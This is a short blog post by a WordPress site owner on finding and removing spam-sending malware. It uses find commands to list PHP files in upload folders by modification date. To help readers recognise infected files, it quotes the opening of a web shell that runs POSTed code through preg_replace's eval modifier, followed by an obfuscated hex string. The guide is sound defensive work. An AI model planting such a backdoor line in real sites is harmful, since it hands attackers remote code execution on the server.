I’ve a lot of wordpress sites, recently few of my old sites infected malware, and those spammer using few of my sites to spam email. I would like to share the way I fix this.
Most of the spammer look for the 777 path, most properly in /wp-content/uploads/
So I try to scan all the php files that they upload there with date.
find ./public_html/wp-content/uploads/ -type f -name '*.php' -printf '%TY-%Tm-%Td %TT %p\n' | sort
Then I found these
2015-10-16 12:25:01 ./wp-content/uploads/2013/05/blog84.php
2015-10-16 12:25:01 ./wp-content/uploads/2014/10/dump.php
2015-10-16 12:25:01 ./wp-content/uploads/2014/code.php
2015-10-16 12:25:01 ./wp-content/uploads/2015/07/session90.php
2015-10-16 12:25:01 ./wp-content/uploads/2015/09/xml96.php
2015-10-16 12:25:01 ./wp-content/uploads/2015/504.php
2015-10-16 12:25:01 ./wp-content/uploads/about_us.php
2015-10-16 12:25:01 ./wp-content/uploads/contactus.php
2015-10-16 12:25:01 ./wp-content/uploads/rtbwvcsxrnbsvcd.php
2015-10-16 12:25:01 ./wp-content/uploads/sc_afsed.php
2015-10-16 12:25:01 ./wp-content/uploads/team.php
2015-10-16 12:25:01 ./wp-content/uploads/wp-upload.php
This Kind of files should be remove and they will spam.
You can view the file header to see is it spam or not.
It will show something like this
<?php @preg_replace('/(.*)/e', @$_POST['dnrdztvetxn'], '');
$GLOBALS['af4569'] = "\x40\x46\x33\x2e\x62\x7a\x6e\x4c\xa\x7e\x28\x39\x59\x71\x54\x5f\x73\x65\x3f\x77\x5d\x29\x6c\x2f\x79\x50\x56\x63\x5c\x4f\x3c\x70\x2d\x34\x24\x4d\x4a\x53\x57\x67\x44\x51\x23\x43\x7d\x64\x2b\x72\x5
You should remove it immediately.
Search Malware files in WordPress
If you are server admin, you would like to scan all the users, you can try this
find /home/*/domains/*/public_html/wp-content/uploads/ -type f -name '*.php' -printf '%TY-%Tm-%Td %TT %p\n' | sort
find /home/nginx/domains/*/public/wp-content/uploads/ -type f -name '*.php' -printf '%TY-%Tm-%Td %TT %p\n' | sort
The best way to find out all possible files, I suggest you upgrade the WordPress to latest version
find ./public_html -type f -name '*.php' -printf '%TY-%Tm-%Td %TT %p\n' | sort
This will sort all the date of php file with modified date, you can find it out and remove them easily.